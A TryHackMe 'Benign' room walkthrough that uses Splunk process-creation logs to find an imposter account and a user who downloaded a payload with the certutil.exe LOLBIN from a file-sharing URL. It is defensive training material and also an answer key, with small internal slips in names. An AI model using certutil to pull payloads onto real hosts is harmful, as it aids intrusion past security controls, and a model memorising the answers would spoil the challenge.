Benign | Tryhackme Walkthrough
Task 1: Introduction
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3-5 minutes to start.
the required logs are ingested in the index win_eventlogs.
Task 2 Scenario: Identify and Investigate an Infected Host
One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion.
Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.
About the Network Information
The network is divided into three logical segments. It will help in the investigation.
IT Department
James
Moin
Katrina
HR department
Haroon
Chris
Diana
Marketing department
Bell
Amelia
Deepak
Answer the questions below
- How many logs are ingested from the month of March, 2022?
Ans: 13959
- Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
Ans: Amel1a
Lets take a look at “Usernames” field
There are a total of 11 usernames, but only 10 are visible.
Lets see all usernames, and how many occurrence of each in the events
“Two usernames are very similar — even though ‘Diana’ is spelled differently, having only one letter difference between two accounts is especially suspicious.”
- Which user from the HR department was observed to be running scheduled tasks?
Ans: Chris.fort
- Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.
Ans: haroon
This is the hint you’re looking for: Explore lolbas-project.github.io/ to find binaries used to download payloads
Look at the executables that are capable of downloading files. There are many of them, lets start from the start, When you click on one, you’ll see detailed information on how it’s used. For deeper understanding, check its associated MITRE ATT&CK techniques — they’re very helpful.
Eg: certiutil.exe can download files from the Internet unlike others
I looked for each executable names above ; certutil.exe returned matching events in Splunk.
Use these to answer below questions:
The user Harron used certutil.exe (a legitimate Windows binary) to download benign.exe from the URL https://controlc.com/e4d11035.
- To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
Ans: certutil.exe
- What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)
Ans: 2022-03-04
- Which third-party site was accessed to download the malicious payload?
Ans: controlc.com
- What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
Ans: benign.exe
- The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
"Let’s visit the URL the malicious file was downloaded from”
- What is the URL that the infected host connected to?
Ans: https://controlc.com/e4d11035
Thanks for reading! I hope you enjoyed this walkthrough!
Keep Hunting!
